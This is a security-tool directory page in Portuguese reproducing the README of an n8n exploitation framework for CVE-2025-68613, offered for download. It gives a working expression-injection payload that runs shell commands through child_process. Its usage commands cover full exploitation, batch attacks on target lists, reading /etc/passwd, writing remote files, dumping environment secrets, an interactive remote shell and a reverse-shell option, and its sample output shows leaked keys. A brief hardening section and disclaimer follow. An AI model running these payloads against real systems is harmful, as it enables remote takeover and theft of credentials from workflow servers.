Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Execução Remota de Código em Automação de Fluxo de Trabalho | Kitploit
Ferramentas/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ferramenta de Acesso Remoto
Desenvolvimento de Payloads
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Execução Remota de Código em Automação de Fluxo de Trabalho

Ver Repositório
53há 7 mesesAinda não revisado

n8n God Mode Ultimate - Scanner & Framework de Exploração CVE-2025-68613

n8n God Mode Ultimate

Scanner RCE Avançado de Automação de Workflows n8n e Ferramenta de Exploração

Python Version License CVE CVSS Score


🎯 Visão Geral

n8n God Mode Ultimate é um framework abrangente de teste de segurança projetado para detectar e validar o CVE-2025-68613 em plataformas de automação de workflows n8n. Esta vulnerabilidade crítica de Execução Remota de Código (RCE) afeta versões do n8n através de injeção de expressões em contextos de execução de workflows.

Detalhes do CVE-2025-68613

  • Pontuação CVSS: 10.0 (Crítica)
  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Privilégios Necessários: Baixos (credenciais válidas)
  • Interação do Usuário: Nenhuma
  • Tipo de Vulnerabilidade: Injeção de Expressão → Execução Remota de Código

Versões Afetadas:

  • n8n >= 0.211.0 and < 1.120.4
  • n8n >= 1.121.0 and < 1.121.1

Versões Corrigidas:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Funcionalidades

🔍 Detecção e Varredura

  • Detecção Inteligente de Versão - Extrai a versão do n8n a partir dos metadados da página de login
  • Varredura em Lote - Varredura concorrente multi-thread de alvos com rastreamento de progresso
  • Múltiplos Modos de Varredura:
    • --detect - Apenas detecção de versão (mais rápida, não intrusiva)
    • --safe - Verificação segura de vulnerabilidade sem exploração
    • --poc - Validação de prova de conceito RCE
    • --exploit - Modo de exploração completo

💣 Capacidades de Exploração

  • 4 Técnicas de Exploração:
    1. Gatilho Agendado - Workflow de execução automática (mais confiável)
    2. Gatilho Webhook - Execução acionada por HTTP
    3. Nó de Código - Acesso direto ao child_process
    4. Injeção de Expressão - Execução manual de expressão

🎮 Funcionalidades do Modo Deus

  • Shell Interativo - Shell remoto completo com histórico de comandos
  • Operações de Arquivo:
    • read <file> - Ler arquivos remotos
    • write <file> <content> - Escrever arquivos no alvo
  • Extração de Ambiente - Despejar todas as variáveis de ambiente
  • Informações do Sistema - Detalhes do SO, configuração de rede, informações de processo
  • Reverse Shell - Geração opcional de payload de reverse shell
  • Histórico de Comandos - Rastreamento de histórico embutido

📊 Capacidades Avançadas

  • Enumeração de Credenciais - Extrai credenciais armazenadas via API
  • Despejo de Workflows - Exporta todos os workflows com metadados
  • Extração de Configuração - Despejo completo da configuração do sistema
  • Enumeração de Usuários - Lista todos os usuários do n8n
  • Análise de Log de Execução - Analisa saídas de comandos de execuções de workflows
  • Limpeza Automatizada - Exclusão opcional de workflows após a execução

🚀 Instalação

Pré-requisitos

root@kitploit:~
# Python 3.8 ou superior
python3 --version

# gerenciador de pacotes pip
pip3 --version

Instalar Dependências

root@kitploit:~
# Clone o repositório
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Instale os pacotes necessários
pip3 install -r requirements.txt

Requisitos

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Uso

Uso Básico

root@kitploit:~
# Exibir menu de ajuda
python3 n8n-godmode-ultimate.py -h

# Detectar versão do n8n (não intrusivo)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Verificação segura de vulnerabilidade
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Prova de conceito RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Exploração completa
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Operações do Modo Deus

root@kitploit:~
# Executar comando único
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Ler arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Escrever arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extrair variáveis de ambiente
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Shell interativo
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Varredura em Lote

root@kitploit:~
# Escanear múltiplos alvos a partir de arquivo
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Exploração em lote
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Formato do targets.txt:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Comandos do Shell Interativo

Uma vez no modo shell (--shell):

root@kitploit:~
n8n> whoami              # Executar comando
n8n> read /etc/passwd    # Ler arquivo
n8n> env                 # Mostrar variáveis de ambiente
n8n> info                # Informações do sistema
n8n> history             # Histórico de comandos
n8n> exit                # Sair do shell

🛠️ Opções de Linha de Comando

Opções de Alvo

root@kitploit:~
-u, --url URL             URL do n8n alvo
-l, --list FILE           Arquivo contendo URLs dos alvos
-t, --threads NUM         Número de threads para varredura em lote (padrão: 10)

Autenticação

root@kitploit:~
-e, --email EMAIL         Email do usuário n8n
-p, --password PASS       Senha do usuário n8n

Modos de Varredura

root@kitploit:~
--detect                  Apenas detecção de versão (mais rápida)
--safe                    Verificação segura sem exploração
--poc                     Prova de conceito RCE
--exploit                 Modo de exploração completo

Modo Deus

root@kitploit:~
--god                     Ativar modo deus
--cmd COMMAND             Executar comando único
--read-file PATH          Ler arquivo remoto
--write-file PATH         Escrever arquivo remoto
--content DATA            Conteúdo para operação de escrita
--dump-env                Extrair todas as variáveis de ambiente
--shell                   Modo shell interativo
--revshell HOST:PORT      Payload de reverse shell

Opções de Exploração

root@kitploit:~
--mode MODE               Modo de exploração: schedule|webhook|code|expression (padrão: schedule)
--timeout SEC             Tempo limite do comando em segundos (padrão: 30)
--cleanup                 Excluir workflows após a execução
-k, --insecure           Desabilitar verificação SSL
-v, --verbose            Saída detalhada
-q, --quiet              Saída mínima

🔬 Detalhes Técnicos

Metodologia de Exploração

1. Gatilho Agendado (Recomendado)

Cria um workflow com um gatilho agendado que executa automaticamente a cada 3 segundos. Método mais confiável.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Gatilho Webhook

Cria um endpoint webhook HTTP que executa comandos quando acionado.

3. Nó de Código

Injeta código diretamente em um nó de Código com acesso ao child_process.

4. Injeção de Expressão

Execução manual através do sistema de avaliação de expressões do n8n.

Detecção de Versão

Extrai a versão da configuração Sentry codificada em base64 na página de login:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

Endpoints da API Utilizados

  • /rest/login - Autenticação
  • /rest/workflows - Operações CRUD de workflows
  • /rest/credentials - Enumeração de credenciais
  • /rest/executions - Recuperação de logs de execução
  • /rest/users - Enumeração de usuários
  • /rest/settings - Configuração do sistema

📊 Exemplos de Saída

Detecção de Versão

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)

Prova de Conceito RCE

root@kitploit:~
[*] Authentication successful
[*] Creating exploitation workflow...
[*] Workflow ID: hd6LxSY765WBThqd
[*] Executing command: whoami
[✓] Command executed successfully!
[+] Output: root

Shell Interativo

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Environment Variables:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ Medidas Defensivas

Ações Imediatas

  1. Atualizar para a versão corrigida (>= 1.120.4 ou >= 1.121.1)
  2. Desabilitar credenciais padrão ([email protected]:admin)
  3. Implementar autenticação forte (MFA recomendado)
  4. Segmentação de rede - Restringir acesso à instância n8n
  5. Auditar workflows - Revisar todos os workflows ativos
  6. Monitorar logs de execução - Verificar atividades suspeitas

Fortalecimento a Longo Prazo

  • Habilitar log de auditoria
  • Implementar lista de permissões IP
  • Usar autenticação OAuth/SSO
  • Avaliações de segurança regulares
  • Manter o n8n atualizado
  • Criptografia de banco de dados em repouso
  • Armazenamento seguro de credenciais
  • Monitoramento de tráfego de rede

⚠️ Aviso Legal

APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é fornecida para fins educacionais e testes de segurança autorizados. Os usuários devem cumprir todas as leis e regulamentos aplicáveis.

⚖️ Requisitos Legais

VOCÊ DEVE:

  • ✅ Obter autorização por escrito antes de testar
  • ✅ Usar apenas em sistemas que você possui ou tem permissão para testar
  • ✅ Cumprir práticas de divulgação responsável
  • ✅ Seguir leis e regulamentos aplicáveis
  • ✅ Usar para fins de segurança defensiva

VOCÊ NÃO DEVE:

  • ❌ Testar sistemas sem permissão explícita
  • ❌ Usar para fins maliciosos
  • ❌ Realizar ataques de negação de serviço
  • ❌ Exfiltrar ou modificar dados sem autorização
  • ❌ Implantar em sistemas de produção sem consentimento

📜 Responsabilidade

O autor NÃO assume responsabilidade pelo uso indevido desta ferramenta. O acesso não autorizado a sistemas de computador é ilegal de acordo com:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act - UK
  • EU Cybercrime Directive
  • Legislação similar em todo o mundo

Use por sua conta e risco. Você é responsável por suas ações.


🤝 Contribuindo

Contribuições são bem-vindas! Por favor, siga estas diretrizes:

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade (git checkout -b feature/improvement)
  3. Faça commit das suas alterações (git commit -am 'Add new feature')
  4. Envie para o branch (git push origin feature/improvement)
  5. Crie um Pull Request

Código de Conduta

  • Siga práticas de divulgação responsável
  • Documente as funcionalidades de segurança claramente
  • Inclua tratamento de erros adequado
  • Adicione comentários para lógica complexa
  • Teste completamente antes de enviar

📚 Referências

Informações do CVE

  • CVE-2025-68613 - NVD
  • n8n Security Advisories

Documentação do n8n

  • Documentação Oficial do n8n
  • Referência da API do n8n
  • Melhores Práticas de Segurança do n8n

Pesquisa de Segurança

  • Expression Injection Vulnerabilities
  • Workflow Automation Security

👨‍💻 Autor

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • Website: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 Agradecimentos

  • Equipe do n8n por construir uma plataforma incrível de automação de workflows
  • Pesquisadores de segurança na comunidade n8n
  • Ferramentas de segurança de código aberto que inspiraram este projeto

📞 Suporte

Para problemas de segurança, reporte de forma responsável:

  • Problemas de Segurança: Abra um advisory de segurança privado
  • Relatórios de Bug: Use o GitHub Issues
  • Solicitações de Funcionalidades: Abra uma Discussão no GitHub

⭐ Dê uma estrela neste repositório se achou útil!

Feito com 💻 por pesquisadores de segurança, para pesquisadores de segurança

Baixar ferramenta